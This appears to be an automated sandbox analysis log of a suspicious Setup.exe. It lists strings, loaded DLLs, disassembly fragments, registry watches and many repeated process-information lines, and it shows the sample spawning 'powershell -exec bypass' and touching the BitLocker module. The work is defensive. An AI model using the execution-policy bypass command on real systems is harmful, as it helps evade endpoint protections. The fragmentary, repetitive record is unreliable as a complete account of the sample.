Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Setup.exe	String found in binary or memory: -Helper process exited with failure code: 0x%x
Source: Setup.exe	String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
Source: Setup.exe	String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
Source: Setup.exe	String found in binary or memory: /LoadInf=

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\user\Desktop\Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Setup.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Setup.exe

Static file information: File size 76122589 > 1048576

Source: Setup.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2a9200

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026381820.0000000006D1A000.00000004.00000020.00020000.00000000.sdmp

Source: Setup.exe

Static PE information: section name: .didata

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0102C8AE push eax; retf	0_3_0102C8C9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_010321C6 push edi; retf	0_3_010321D9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_010321C6 push edi; retf	0_3_010321D9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392880A push ebx; retf	0_3_03928819
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392880A push ebx; retf	0_3_03928819
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392880A push ebx; retf	0_3_03928819
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392888B push cs; iretd	0_3_039288A1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392888B push cs; iretd	0_3_039288A1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392888B push cs; iretd	0_3_039288A1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927AEC push esi; retf	0_3_03927AEF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927AEC push esi; retf	0_3_03927AEF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927AEC push esi; retf	0_3_03927AEF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_01036739 pushad ; retf	0_3_01036841
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_010321C6 push edi; retf	0_3_010321D9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_010321C6 push edi; retf	0_3_010321D9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_010368F8 push esi; retf	0_3_010368FB
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392880A push ebx; retf	0_3_03928819
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392880A push ebx; retf	0_3_03928819
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392880A push ebx; retf	0_3_03928819
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392888B push cs; iretd	0_3_039288A1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392888B push cs; iretd	0_3_039288A1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392888B push cs; iretd	0_3_039288A1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927AEC push esi; retf	0_3_03927AEF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927AEC push esi; retf	0_3_03927AEF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927AEC push esi; retf	0_3_03927AEF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392880A push ebx; retf	0_3_03928819
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392880A push ebx; retf	0_3_03928819
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392880A push ebx; retf	0_3_03928819
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392888B push cs; iretd	0_3_039288A1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392888B push cs; iretd	0_3_039288A1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392888B push cs; iretd	0_3_039288A1

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
